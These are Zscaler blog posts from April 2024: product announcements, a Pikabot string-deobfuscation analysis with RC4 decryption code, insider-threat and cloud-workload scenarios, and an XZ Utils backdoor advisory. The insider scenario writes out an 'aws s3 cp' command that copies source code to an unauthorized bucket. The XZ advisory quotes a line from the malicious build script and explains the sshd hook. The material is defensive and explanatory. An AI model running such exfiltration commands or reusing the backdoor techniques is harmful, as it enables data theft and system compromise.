Zscaler Blog — News and views from the leading voice in cloud security.

Zscaler Announces Intent to Acquire Airgap Networks to Extend Zero Trust SASE Leadership and Eliminate the Need for Firewall-based Segmentation

Overview

Today, Zscaler has announced the next major step in its Zero Trust SASE leadership by signing an agreement to acquire Airgap Networks, which provides agentless segmentation for enterprise IT and OT environments. With this acquisition, Zscaler will combine its Zero Trust SD-WAN with Airgap to extend the Zero Trust Exchange to protect east-west traffic in branch offices, campuses, factories and plants with critical OT infrastructure. This next step in our SASE leadership will eliminate the need for east-west firewalls, NACs and microsegmentation and deliver greater operational simplicity.

Controlling lateral movement is the cornerstone of Zero Trust

To understand why today’s news is important, let’s reflect on the challenges that organizations face in combating attackers. Adversaries are becoming faster and ever more effective at evading even the most sophisticated security controls with AI-enhanced social engineering and identity-based attacks. Once they compromise an organization, they move laterally to reach sensitive data or critical resources. Once the targets or crown jewels (typically high-value data) have been identified and reached, the goal is to exfiltrate the data as quickly and quietly as possible. While Zero Trust cannot be achieved without a holistic strategy that addresses every stage of this typical cyber attack chain - also known as a defense-in-depth approach - restricting lateral movement, and properly containing the adversary once your organization has been compromised, is where real Zero Trust technologies must prove their worth. To date, the primary vehicle for addressing lateral movement on local area networks has been network-based segmentation and microsegmentation.
How traditional segmentation and firewalls have fallen short

Segmentation has been carried out with aging, IP-centric networking technologies like NAC and east-west firewalls, managed through complex constructs like ACLs based on MAC addresses, IP addresses and VLANs. This complexity places considerable strain on network operations teams, who are forced to write, maintain and update countless ACLs or internal firewall rules while addressing the inevitable misconfigurations that break business-critical applications or leave gaps in segmentation coverage. The complexity that east-west firewalls bring means most segmentation projects are never fully implemented, and even those that are partially completed quickly experience segmentation policy drift as workloads and applications move and organizations’ environments change.

The significance of a ‘network of one’

Why is Airgap’s technology so compelling? Their agentless, identity-based approach to segmentation is a total re-think of the complexity of legacy segmentation approaches, delivering stronger, more predictable segmentation outcomes and greater operational simplicity. This highly secure but simplified approach includes a Dynamic Host Configuration Protocol (DHCP) proxy, which creates a "network of one" for all connected endpoints, including those configured with static IP addresses. The DHCP proxy intercepts all DHCP requests from devices trying to join the LAN, which enables Airgap to assign a /32 IP address and default gateway, effectively creating a segment of one. Airgap can then dynamically control access through continuous assessment of identity and context. As a result, Airgap can provide visibility and policy enforcement at every connected endpoint without adding any software to those sensitive endpoints. This approach eliminates the risk of east-west lateral movement on local networks as well as the complexity of traditional segmentation approaches like east-west firewalls, without hardware upgrades or operational disruption.
Agentless Segmentation

It is critical to understand that an agentless approach is essential for effective east-west segmentation on LANs, given that in many scenarios, be it unmanaged devices, aging legacy servers, or headless IoT/OT infrastructure, deploying agents is an impossibility. With Airgap, however, Zero Trust segmentation is possible in campus LAN and OT environments, no matter the device.

Comprehensive Zero Trust Segmentation

If you have been a customer or followed Zscaler, you’ll know we take segmentation very seriously as a measure to counter lateral movement of threats. In the Zero Trust Exchange, we currently protect thousands of organizations with Zero Trust Segmentation, which comprises multiple methods of segmentation depending on the environment and scenario. This includes Zero Trust SD-WAN to securely connect locations and segment them without site-to-site VPNs. Zero Trust Segmentation is made up of:

- User-to-app segmentation: Users access private applications directly, without being put on a network.
- Location segmentation: Zero Trust SD-WAN ensures connections are made directly to applications from an office, rather than connecting to a routable network. No more site-to-site VPNs.
- Workload segmentation: Least-privilege access segments cloud workload-to-workload communications across hybrid and multi-cloud environments.

Now with Airgap, we further extend Zero Trust Segmentation to deliver visibility and segmentation for east-west traffic on LANs, including critical OT environments. Some of the use cases that can be addressed on day one are:

East-West Firewall Replacement

We will extend Zero Trust to the LAN by enforcing segmentation on east-west traffic. This shrinks the internal attack surface and eliminates the threat of lateral movement on campus, data center, and OT networks. There is no need for NAC or firewall-based segmentation.
To enforce zero trust segmentation on campus, branch, and data center networks, Airgap will:

- Automatically provision every device into a segment of one (/32).
- Auto-group devices, users and apps by analyzing traffic patterns. This prevents rogue devices from using MAC spoofing to get onto the network.
- Dynamically enforce policies for east-west traffic based on the identity and context of users and devices.

IT/OT Segmentation

Airgap’s technology acts as a ransomware kill switch, disabling non-essential device communication to halt lateral threat movement without interrupting business operations. Airgap’s solution neutralizes advanced threats, such as ransomware on IoT devices, OT systems, and agent-incapable devices. To secure IoT and OT, Airgap will:

- Autonomously group and enforce policy for known MAC addresses on any device; e.g., RDP access to cameras is denied except for admins.
- Automatically isolate unknown MAC addresses to limit the blast radius in case of a compromised device.
- Integrate with asset management systems for secure access control policies.

Automatic Device Discovery & Classification

A significant portion of IT/OT traffic stays within the factory or campus, hence it is important to have continuous visibility into east-west traffic. With automatic device discovery and classification, network admins can better manage performance, uptime and security for IoT/OT systems without complex inventory management. For network and device visibility, Airgap will:

- Discover, classify and inventory IoT/OT devices without the need for endpoint agents.
- Baseline traffic patterns and device behaviors in order to determine authorized and unauthorized access.
- Gain AI-driven network insights for performance management and threat mapping.

Modern segmentation for the enterprise, without the complexity

- Eliminate lateral threat movement across LANs.
- Reduce the operational complexity and cost associated with legacy segmentation tools.
- Gain enhanced visibility into east-west traffic with discovery, classification and device inventory, without the need for endpoint agents.

We invite you to learn more about Airgap’s technology in an upcoming briefing on April 16th.

Thu, 11 Apr 2024 05:00:00 -0700 | Naresh Kumar


Zscaler is showcasing Zero Trust + AI at the 2024 AWS Summit events across Europe

In today’s dynamic digital landscape, organizations are rapidly adopting artificial intelligence (AI) and Generative AI (GenAI) tools to increase productivity, gain new insights, and obtain a competitive advantage. The newly released Zscaler ThreatLabz 2024 AI Security Report sheds light on key trends, risks, and best practices in enterprise AI adoption, along with insights into AI-driven threats and key strategies to defend against them. Analyzing over 18 billion transactions from April 2023 to January 2024 across the Zscaler Zero Trust Exchange cloud security platform, some of the key findings are:

- Enterprise use of AI/ML tools has skyrocketed by nearly 600%.
- 569 terabytes of enterprise data were exchanged with AI tools.
- ChatGPT usage has increased by 634%, even though it is also the most-blocked AI application by enterprise organizations.
- AI is empowering threat actors in unprecedented ways.

This is not just a numerical phenomenon but represents a profound shift in the way organizations across industries and geographies are embracing AI technologies. However, with terabytes of data sent to various AI tools, the need for effective data protection measures is a top priority, driven not only by the need to classify and protect sensitive data to prevent it from leaving the organization by mistake, but also by the need to prevent data exfiltration caused by bad actors, malware, and new AI-powered threats.
Never has the demand for robust cybersecurity been more important.

Zscaler Leadership and Advantage: In AI, Data Wins

Enabling more secure use of AI and GenAI tools in organizations and using AI to provide a stronger security posture are two crucial aspects of the modern landscape. An AWS Advanced Technology Partner, Zscaler has been a leader in zero trust for over a decade. As organizations wage the battle against cyberattacks, they must deploy robust defense systems, including zero trust architectures that utilize AI to effectively combat evolving threats while keeping users productive. The best AI is powered by the best data, and that is what makes Zscaler stand out. Operating the world's largest security cloud and processing over 400 billion transactions daily, Zscaler ensures access to the most relevant cyber threat data. Prioritizing three key elements for effective enterprise AI – vast datasets exceeding 500 trillion daily signals, deep domain expertise, and a skilled team of data scientists – Zscaler leverages complete logs, full URLs and anonymized data to train its LLMs. This approach ensures rich data for AI training, unlike DNS and firewall logs, which often lack detail or are blind to encrypted traffic. As a result, Zscaler continually improves its AI models with high-volume, high-quality data, empowering IT and security teams with valuable insights and solutions.

Come and visit us at the 2024 AWS Summit events

As apps move to the cloud, cyberattacks become more sophisticated, and users work from anywhere using any device, perimeter security using VPNs and firewalls provides incomplete, inconsistent security and a poor user experience. With the Zero Trust Exchange powered by AI, Zscaler provides comprehensive visibility, control, and security for all cloud-based applications within a unified platform.
At the 2024 AWS Summit events, you can discover how Zscaler empowers organizations to:

- Improve security posture with zero trust
- Reduce attack surface and prevent lateral threats
- Accelerate migration of on-prem apps to AWS
- Enjoy fast, direct access to private apps and workloads
- Deploy AI-powered security for sensitive data, workloads, and GenAI data
- And more

Visit us at the 2024 AWS Summit events, which include EMEA stops at:

- Amsterdam on April 9
- London on April 24
- Berlin on May 15-16
- Milan on May 23
- Stockholm on June 4
- Madrid on June 5

The 2024 AWS Summits are free events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Stop by our booth to learn more about Zscaler solutions for AWS and how to safely embrace GenAI tools while leveraging AI for an improved security posture. To learn more about the 2024 EMEA AWS Summit events and to register, click here. And to learn more about Zscaler solutions for AWS, visit our website.

Tue, 09 Apr 2024 02:07:52 -0700 | Yaroslav Rosomakho


Automating Pikabot’s String Deobfuscation

Introduction

Pikabot is a malware loader that originally emerged in early 2023, with one of its prominent features being the code obfuscation that it leverages to evade detection and thwart technical analysis. Pikabot employed the obfuscation method to encrypt binary strings, including the addresses of the command-and-control (C2) servers. In this article, we briefly describe the obfuscation method used by Pikabot and present an IDA plugin (with source code) that we developed to assist in our binary analysis. As mentioned in our previous article, the obfuscation method was removed when Pikabot re-emerged with a new version in early 2024. As of April 2024, this obfuscation method has not been used again in any Pikabot samples.

Key Takeaways

- Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023.
- Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms.
- Previously, the strings were encrypted using a combination of the AES-CBC and RC4 algorithms.
- The string obfuscation’s implementation is similar to ADVobfuscator.
- In this article, we describe the binary strings’ obfuscation algorithm and our approach to decrypting the binary strings using IDA’s microcode.
- Zscaler ThreatLabz developed an IDA plugin to automatically decrypt Pikabot’s obfuscated strings and is releasing the source code.

Technical Analysis

Strings obfuscation

The steps for decrypting a Pikabot string are relatively simple. Each string is decrypted only when required (in other words, Pikabot does not decrypt all strings at once). Pikabot follows the steps below to decrypt a string:

1. Pushes the encrypted string array onto the stack.
2. Initializes the RC4 encryption algorithm. The RC4 key is different for each string (with very few exceptions).
3. Takes the decrypted RC4 output, decodes it using Base64 after replacing all instances of the character ‘_’ (underscore) with ‘=’ (equals sign), and decrypts it using the AES-CBC algorithm. The AES key and initialization vector (IV) are the same for all strings.

ANALYST NOTE: There are encrypted strings which are encrypted only with the RC4 algorithm.

Figure 1 shows the code used to decrypt the string Kernel32.dll.

Figure 1: Example Pikabot string decryption for Kernel32.dll.

Figure 2 shows the function that first decrypts the AES key and IV. The RC4-decrypted string passed to the function is then Base64 decoded and finally decrypted using AES.

Figure 2: Pikabot Base64 decoding and AES decryption function.

Decrypting Pikabot strings

The following information is required to decrypt a Pikabot string:

- The AES key and IV of a binary sample.
- The RC4 encrypted array of each string.
- The RC4 key of each encrypted string.
- The string’s size.

Our approach relies on IDA’s microcode.
This decision helped us with several problems, such as:

- IDA’s microcode converts the assignment/copy of the RC4 key into a strcpy function. At the assembly level, this could be either multiple mov instructions or rep instructions, which would make detection and extraction harder and more challenging.
- Extracting the RC4 encrypted array. Since IDA reconstructs the stack, it makes it much easier to search for and extract the encrypted array.

IDA’s microcode brings other limitations (for example, decompilation failure for a function), but no such issues were encountered for the parts of the code we wanted to analyze. In the sections below, we describe how each component was extracted.

Extracting the AES key/IV

For the extraction of the AES key and IV, we iterate over all analyzed functions and discard any function whose size is not between 600 and 1,600 bytes. Next, we scan the functions for the following patterns:

- Existence of RC4 encryption. This is the same heuristic we use for detecting encrypted RC4 strings.
- Existence of the values 0x3D and 0x5F (used before Base64 decoding the string), used with the microcode opcodes m_stx and m_jnz respectively.

Lastly, if all of the patterns above match, then the handler for decrypting a Pikabot string is invoked. For the classification of the key and the IV, we apply the following checks:

- The number of decrypted strings from the identified function must be two. Otherwise, the identified function is incorrect.
- The longest string is marked as the AES key (by taking the first 32 bytes) and the remaining decrypted string as the IV (by taking the first 16 bytes).

Extracting the RC4 encrypted array

Pikabot constructs the RC4 encrypted array by pushing it onto the stack and then decrypting it. Our approach involves the following steps for detecting each part of the array:

- Use the detected RC4 encryption block address as a starting point.
- Search for the microcode opcode m_add in the decryption instruction.
- The detected microcode holds the starting stack offset of the encrypted array.
- Start iterating backwards and search for the microcode opcodes m_mov/m_call; the second opcode is used in case the data is copied via a strcpy or memcpy call. If the stack offset matches, then we save the data and update the stack offset.
- This process is repeated until the reconstructed encrypted array has the expected size.

Extracting the RC4 encrypted array size

The length of the encrypted array is extracted in a similar way to the encrypted array. The detection pattern is:

- Use the detected RC4 encryption block address as a starting point.
- Search for the microcode opcodes m_jb, m_jae, and m_setb, and use the immediate constant in the instruction as the size.

Extracting the RC4 key

Extracting the RC4 key of each string proved to be the most challenging part of creating the plugin. In our first attempt, we extracted the RC4 key after detecting the initialization of the RC4 algorithm. However, this approach had the following issues:

- Incorrect extraction of the RC4 key: In many cases, an invalid/junk string was placed in between the correct RC4 key and the RC4 algorithm initialization.
- Incorrect detection of the RC4 initialization code block: For example, if the size of the encrypted array was 256 bytes, then an incorrect RC4 key would be detected.

Instead of trying to detect the RC4 key by detecting the initialization of the RC4 algorithm, we decided to extract all strings from each targeted function. Then, we decrypted the RC4 encrypted array with each extracted RC4 key and validated the decrypted output by applying the following checks:

- It matches the expected string size.
- All characters of the string are readable; for example, the decrypted string does not contain any junk characters.

ANALYST NOTE: After successful decryption, the RC4 key is marked and not reused in order to limit any false positives.
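As an added example (not the ThreatLabz plugin code), the RC4 stage of the string decryption described above, together with the trial-decryption approach used to recover each string's RC4 key: every string found in the function is tried as the key, the output is validated by expected size and readable characters, and the matching key is marked as used. The sample string, key and decoy candidates are constructed for the example; the AES-CBC stage that follows for AES-protected strings is not performed here, only the '_' to '=' Base64 normalization that precedes it.

```python
import base64

# Printable ASCII (0x20-0x7E): the "readable characters" check from the article.
READABLE = set(range(0x20, 0x7F))


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_valid(plaintext: bytes, expected_size: int) -> bool:
    """The two checks applied to a candidate decryption: the result has the size
    recovered from the m_jb/m_jae/m_setb immediate, and every byte is readable."""
    return len(plaintext) == expected_size and all(b in READABLE for b in plaintext)


def recover_rc4_string(encrypted, expected_size, candidate_keys, used_keys):
    """Try every string found in the function as the RC4 key, accept the first
    candidate whose output passes validation, and mark that key as consumed so
    it is not matched again (the false-positive guard from the analyst note)."""
    for key in candidate_keys:
        if not key or key in used_keys:
            continue
        plaintext = rc4(key, encrypted)
        if looks_valid(plaintext, expected_size):
            used_keys.add(key)
            return plaintext
    return None


def undo_pikabot_base64(rc4_output: bytes) -> bytes:
    """Second stage for AES-protected strings: Pikabot writes Base64 padding as
    '_' instead of '='. Restoring it and decoding yields the AES-CBC ciphertext
    that the sample-wide AES key and IV decrypt (AES stage not performed here)."""
    return base64.b64decode(rc4_output.replace(b"_", b"="))


def demo():
    """Constructed sample: an RC4-only string whose key sits behind junk candidates."""
    secret = b"Kernel32.dll"
    real_key = b"constructed-rc4-key"          # constructed; not a real Pikabot key
    encrypted = rc4(real_key, secret)          # what the plugin rebuilds from the stack
    # Strings as they would be pulled from the function: junk and a decoy appear
    # before the real key, mirroring the "junk string in between" problem above.
    candidates = [b"\x90\x90\x90junk", b"decoy-string", real_key, b"Kernel32.dll"]
    used = set()
    return recover_rc4_string(encrypted, len(secret), candidates, used), used


if __name__ == "__main__":
    plaintext, used = demo()
    print(plaintext, used)
```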
IDA Plugin

We tested our Pikabot plugin with IDA versions 8 and newer. The plugin can be used by compiling the source code with IDA's SDK and copying the generated DLL into the IDA plugins folder. After a Pikabot sample is loaded, the user can decompile a function, right-click in the decompiled output and choose to decrypt strings either in the current function or in all of them (Figure 3).

Figure 3: IDA Pikabot plugin options.

For each decrypted string, the plugin sets a comment in the decompiled output. Figure 4 shows a function with the obfuscated strings before the plugin is invoked.

Figure 4: Before running the Pikabot string decryption plugin.

Figure 5 shows the output after our Pikabot IDA plugin is executed.

Figure 5: Output after running the Pikabot string decryption plugin.

Source Code

The source code for our IDA plugin to deobfuscate Pikabot strings can be found at this GitHub repository.

Conclusion

Older Pikabot variants include a string obfuscation implementation which can make automation a complicated task. By using IDA’s microcode and developing our own plugin, we were able to speed up our analysis in most cases and analyze the code much faster. Since this technique is no longer used by Pikabot, we decided to open source our IDA plugin to assist the research community with defeating current and future stack-based obfuscation techniques.

Zscaler Coverage

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names:

- Win32.Trojan.PikaBot
- Win32.Downloader.PikaBot

Indicators Of Compromise (IOCs)

The following samples were used for testing the plugin.
Acknowledgments

The following projects were the initial inspiration for developing our plugin. In addition, they assisted with the usage of IDA’s SDK:

- HexRaysDeob - by Rolf Rolles
- Goomba - by Hex-Rays

Mon, 08 Apr 2024 08:31:02 -0700 | Nikolaos Pantazopoulos


Join Zscaler for the Future of Digital Experience Monitoring Event

It's time to register for the Future of Digital Experience Monitoring event. Here are a few reasons why you can’t miss it!

See what it takes to keep end users productive no matter the device, network, or application.

Zscaler Digital Experience (ZDX) is built on a foundation that goes beyond siloed monitoring solutions to provide full end-to-end visibility across devices (CPU, memory, Wi-Fi), networks (corporate or public internet), and applications (public or private).

Figure: Zscaler Digital Experience end-to-end data path

Find out what’s behind the high-confidence results delivered by advanced machine learning models.

Machine learning models that provide high-confidence results require an immense amount of data and training, which can't be built overnight. ZDX is powered by the industry’s largest inline security cloud, with 500 trillion daily signals feeding high-quality data to sophisticated AI models.
Figure: Zscaler Zero Trust Exchange

Learn about key ZDX AI capabilities already making an impact for many service desk and network operations teams.

Incident Dashboard includes machine learning models to detect issues across last-mile and intermediate ISPs, applications, Wi-Fi, Zscaler data centers, and endpoints, with correlation. This enables Network Operations to quickly and efficiently find the root cause and focus on restoring reliable connectivity.

Figure: ZDX Incidents Dashboard

ZDX Self Service empowers users to fix problems that impact their digital experience, if the causes are under their control. A lightweight AI engine runs in Zscaler Client Connector and notifies the user of issues such as poor Wi-Fi or high CPU utilization, and then offers ways to resolve the issue, reducing help tickets.

Figure: ZDX Self Service Notifications

Automated Root Cause Analysis reduces strain on service desk and operations teams by identifying root causes of issues—such as high CPU usage, Wi-Fi latency spikes on local routers, slow application response times, and more—that would typically require expert IT knowledge and multiple dashboards. Users can get back to work more quickly and with fewer IT tickets, which tend to spike as users increasingly connect from anywhere using various devices, Wi-Fi access points, ISPs, zero trust environments, and applications.

Figure: ZDX Automated Root Cause Analysis

Join our upcoming webinar event

As organizations strive to optimize digital experiences and ensure secure access to applications and data, the future of digital experience monitoring lies in leveraging advanced AI capabilities. With consolidated digital experience monitoring integrated into a zero trust architecture, IT teams can resolve issues more quickly to enhance performance, reduce costs, and deliver exceptional user experiences. Join our upcoming webinar to discover how ZDX can transform your organization's digital experience monitoring strategy and drive superior business results.
Register now

Dates and times:

- Americas: Thursday, April 25 | 11 a.m. PT
- EMEA: Tuesday, April 30 | 10 a.m. BST
- APAC: Tuesday, April 30 | 10 a.m. IST

Featured speakers:

- Dhawal Sharma, SVP & GM, Product Management, Zscaler
- Javier Rodriguez, Sr. Director, Product Management, Zscaler

Wed, 03 Apr 2024 08:03:01 -0700 | Rohit Goyal


Betrayal in the Cloud: Unmasking Insider Threats and Halting Data Exfiltration from Public Cloud Workloads

Introduction

In today’s digital world, safeguarding sensitive data, such as source code, is crucial. Insider threats are a worthy adversary, posing significant risk, especially when trusted employees have access to valuable repositories. This article explores how a fictitious software development company could use Zscaler security solutions to stop insider attempts to upload source code. By using Zscaler Workload Communications, the fictitious company detects and prevents unauthorized uploads, ensuring the security of its intellectual property.

Insider Threats in the Cloud and How to Stop Them

A fictitious software development company relies on its source code repository as the lifeblood of its operations. Trusted employees have access to this repository to facilitate collaboration and innovation. To mitigate the risk of insider threats, the fictitious company implements Zscaler security solutions. Let’s explore how our products thwart an insider’s attempt to upload source code to an unauthorized destination.

Attack Chain Use Case Steps

Trusted employee access: A trusted employee (insider) has access to the source code repository, enabling them to complete their job responsibilities. A simplified example of source code is shown below:

Insider threat incident: The trusted employee with legitimate access decides to misuse their privileges by attempting to upload source code files to an unauthorized destination—an AWS S3 bucket—with the intention of unauthorized sharing.
user:~$ aws s3 cp sourcecode.c s3://bucket/uploads/sourcecode.c

Figure 1: This diagram depicts how Zscaler blocks insider threats.

Integration with Zscaler Workload Communications: The fictitious company’s source code repository is configured to route all outbound traffic through Zscaler Workload Communications, ensuring that data transmissions undergo rigorous inspection and that security policies are enforced.

ZIA DLP engine implementation: ZIA leverages its powerful inline data loss protection (DLP) engine to analyze data traffic in real time. ZIA’s DLP policies are designed to identify and prevent unauthorized attempts to upload source code files to external storage spaces. An example of DLP configuration options is shown below.

Figure 2: An example of DLP configuration options.

Detection and prevention of file upload attempts: As an insider attempts to upload source code files to the unauthorized AWS S3 bucket, ZIA’s DLP engine detects it as a violation of security policies. Leveraging advanced pattern recognition and behavior analysis, ZIA blocks the upload attempt in real time, preventing the exfiltration of company data. The figure below shows the source code file upload attempt failing in real time.

Figure 2: The source code file upload command receives an error when executed.

The upload attempt, which was in violation of company policy, appears in descriptive log records, as shown below.

Figure 3: A log showing the failed source code file upload, along with important details like user, location, and destination.

Alerting and response: The Zscaler security platform generates immediate alerts upon detecting the unauthorized upload attempt.
How Zscaler Can Help

Zscaler’s security products offer effective solutions against insider threats aimed at source code repositories:

Outbound Data Violation Trigger

By routing through Zscaler’s Cloud Connector, organizations can enforce security policies on all outbound data transmissions, including those from source code repositories. This integration ensures that every upload attempt undergoes security checks, regardless of the destination.

Data Breach Prevention

Zscaler Internet Access (ZIA) features a powerful data loss prevention (DLP) engine that analyzes data in real time. Leveraging advanced DLP policies, ZIA can detect patterns indicative of unauthorized source code uploads. This approach enables organizations to prevent data breaches before they occur.

Instant Alerts

The Zscaler platform provides real-time monitoring of all network activity, including access to source code repositories. Any suspicious behavior, such as attempts to upload source code to unauthorized destinations, triggers immediate alerts. This allows security teams to respond promptly and prevent potential data exfiltration.

Conclusion

With cybersecurity threats on the rise, organizations must combat insider risks effectively. Zscaler solutions offer proactive measures against insider threats, as demonstrated by the hypothetical use case outlined above. By implementing robust DLP policies and real-time monitoring, organizations can protect their critical data from unauthorized access and maintain data integrity. The Zscaler platform equips organizations to tackle insider threats confidently, securing their digital assets effectively.

Tue, 02 Apr 2024 13:31:17 -0700 | Sakthi Chandra


Exposing the Dark Side of Public Clouds - Combating Malicious Attacks on Workloads

Introduction

This article compares the cybersecurity strategies of a company that does not use Zscaler solutions with one that has implemented Zscaler's offerings.
By exploring two different scenarios, we will highlight the advantages of Zscaler zero trust for workload communications and its specific use of data loss prevention.

Threat Propagation Without Zscaler Integration

Lateral Movement Between Workloads

In the following scenario, you’ll see that without Zscaler’s integration, the organization is unable to detect or prevent threats effectively. This allows attackers to move laterally and exfiltrate data undetected, leading to significant security risks.

1. Workload 1 in Azure West sends an HTTP GET request to GitHub for a patch update: Workload 1, deployed in Azure West, initiates an outbound connection to GitHub to fetch a required patch update. This HTTP GET request is sent to GitHub to download the patch:

2. An HTTP response containing malware from GitHub: Unbeknownst to the organization, the HTTP response received from GitHub contains embedded malware.

3. Attacker’s lateral movement to Workload 2: By exploiting the malware present in the HTTP response, an attacker gains access to Workload 1 and subsequently moves laterally to Workload 2 within the Azure West environment. From here, the attacker exploits vulnerabilities or misconfigurations in Workload 2 to achieve a network foothold and establish persistence in Workload 2 that furthers their malicious objectives.

4. Data exfiltration to a command-and-control (C2) server: With access to Workload 2, the attacker exfiltrates sensitive data from the organization’s environment to a remote C2 server.

Threat Containment with Zscaler Integration

In the following scenario, Zscaler’s integrated security platform provides comprehensive protection against various stages of the attack life cycle.
Organizations can use Zscaler Internet Access (ZIA), together with Zscaler Data Loss Prevention (DLP) and Zscaler Workload Communications, to implement:
- Strict access controls
- Malware detection and prevention measures
- Workload segmentation
Enhanced outbound security measures to GitHub (internet): With Zscaler integrated into the organization's infrastructure, outbound traffic from Workload 1 to GitHub is subject to stringent access control policies. Only approved URIs are permitted, which limits communications to trusted destinations; any attempt to access an unauthorized URI is blocked.
Malware detection and prevention: Zscaler's security layers, including content inspection and cloud sandboxing, intercept and inspect the HTTP response from GitHub in real time. Upon detecting malware, Zscaler halts the transfer, preventing Workload 1 from being compromised. Note that URI allowlisting alone would not have stopped this scenario, since GitHub is an approved destination; it is the inline inspection of the response that catches the payload.
Workload segmentation to prevent lateral movement: Zscaler enforces strict segmentation policies so that Workload 1 and Workload 2, which are deployed across two different regions, are treated as private applications with no direct communication allowed between them. This segmentation isolates the workloads and prevents lateral movement between them.
Egress traffic security from Workload 2 with advanced data protection: Egress traffic from Workload 2 is safeguarded by ZIA advanced protection capabilities. By enforcing DLP policies, Zscaler prevents unauthorized data transfers and ensures that sensitive data is not exfiltrated from the organization's environment.
Conclusion
Deploying Zscaler's solutions significantly enhances an organization's ability to combat cyberthreats and safeguard public cloud workloads. Without Zscaler, companies face unmonitored outbound traffic, susceptibility to malware infiltration, and the risk of lateral movement and data exfiltration.
With Zscaler zero trust for workloads, organizations gain comprehensive protection: access control policies, malware detection and prevention, segmentation to prevent lateral movement, and advanced data protection. Implementing Zscaler solutions enables organizations to bolster their defenses, mitigate risk, and protect their intellectual property from evolving threats in an interconnected digital environment.
Tue, 02 Apr 2024 19:14:07 -0700 Sakthi Chandra
CVE Advisory: CVE-2024-3094 - Security Compromise in XZ Utils
Introduction
On March 29th, a security incident surfaced involving XZ Utils, a widely used data compression package shipped with major Linux distributions. Malicious code allowing unauthorized remote SSH access was discovered in versions 5.6.0 and 5.6.1 of XZ Utils. The backdoor has been assigned CVE-2024-3094 with a critical CVSS score of 10.0.
Background
XZ Utils fell victim to a sophisticated supply chain attack in which the attackers targeted liblzma, the compression library that ships with XZ Utils. Upstream OpenSSH does not link liblzma, but several distributions patch sshd to link libsystemd for service notification, and libsystemd in turn depends on liblzma; on those systems the library is loaded into the sshd process. The backdoor uses that path to inject code into the OpenSSH server, giving the attacker remote code execution (RCE). The liblzma build process employs a series of obfuscations to extract a prebuilt object file from a disguised test file in the source tree. That object file is then used to modify specific functions within the liblzma library. Any software that loads this modified liblzma is exposed to data interception, modification and compromise. The malicious code was discovered quickly and is present only in the two most recent versions of the package, 5.6.0 and 5.6.1, both released in the preceding month.
Affected Versions
The following table lists impacted distributions, along with a corresponding recommendation for each.
Alpine Linux
  Affected systems: Edge (active development)
  Affected packages: xz 5.6.1-r0, xz 5.6.1-r1
  Recommendation: Upgrade immediately to the latest version, 5.6.1-r2.
Arch Linux
  Affected systems: N/A
  Affected packages: 5.6.0-1, 5.6.1-1, and/or any release that matches the following criteria: installation medium 2024.03.01; virtual machine images 20240301.218094 and 20240315.221711; container images created between and including 2024-02-24 and 2024-03-28
  Recommendation: Upgrade immediately to the latest version, 5.6.1-2.
Debian
  Affected systems: Debian Unstable (aka "Sid"). This is a testing, unstable and experimental branch.
  Affected packages: xz-utils 5.5.1alpha-0.1 (uploaded on 2024-02-01), up to and including 5.6.1-1
  Recommendation: Revert to 5.4.5 or upgrade to 5.6.1+really5.4.5-1. Note: No stable Debian release is known to be impacted; the compromised packages were only part of Debian testing.
Kali
  Affected systems: N/A
  Affected packages: xz-utils 5.6.0-0.2 and/or any Kali installation updated between March 26th and March 29th
  Recommendation: Apply the latest updates if you updated between March 26th and March 29th.
openSUSE
  Affected systems: MicroOS, Tumbleweed
  Affected packages: 5.6.0, and/or any updates that occurred between March 7th and March 28th
  Recommendation: Revert to 5.4.x. Note: Tumbleweed users also have the option to upgrade to a new Tumbleweed snapshot (20240328 or later) containing the reverted package version 5.6.1.revertto5.4.
Red Hat
  Affected systems: Fedora 40 (see note), Fedora 41, Fedora Rawhide
  Affected packages: xz-5.6.0, xz-5.6.1
  Recommendation: Revert to 5.4.x. Note: Red Hat has advised users to immediately stop using any Fedora 41 or Fedora Rawhide instances until the xz packages are reverted to safe versions. Red Hat Enterprise Linux (RHEL) is not impacted by this vulnerability.
  Updated March 30, 2024: The Fedora 40 beta contains two affected xz library builds, xz-libs-5.6.0-1.fc40.x86_64.rpm and xz-libs-5.6.0-2.fc40.x86_64.rpm. At this time Fedora 40 does not appear to be affected by the actual malware exploit, but all Fedora 40 beta users are encouraged to revert to 5.4.x versions.
Table 1: Impacted distributions, operating systems and packages, with recommendations to address the vulnerability.
Technical Details
The goal of the backdoor behind CVE-2024-3094 is to inject code into the OpenSSH server (sshd) on the victim's machine and allow a remote attacker who holds a specific private key to send an arbitrary payload over SSH. The payload is processed before the authentication step completes and is executed as commands on the victim's machine. This supply chain attack uses multiple stages to decrypt obfuscated payloads and modify the build process of the XZ Utils tools. The obfuscated and encrypted stages, and the final binary backdoor, are hidden in these two test files:
  tests/files/bad-3-corrupt_lzma2.xz
  tests/files/good-large_compressed.lzma
Figure 1 depicts the attack sequence.
Figure 1: A diagram of the attack flow.
The build process uses the following check to ensure that the build host is running Linux on an x86_64 architecture:
  if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); then
In addition, the build process checks whether the package being built is Debian (.deb) or Red Hat (.rpm) based. At run time the injected code inspects environment variables such as TERM and LANG: it verifies that TERM is not set (the daemon process normally has no TERM in its environment, whereas an interactive shell does) and that LANG is set, and it checks that the running binary is /usr/sbin/sshd, since the backdoor is not relevant in other processes. After decrypting and decompressing the malicious payload over multiple stages, the payload is injected into liblzma. The payload hooks the RSA_public_decrypt function, which is used to verify signatures, and extracts the attacker's data from the RSA public modulus N of the client's certificate, decrypting it with the ChaCha20 symmetric stream cipher.
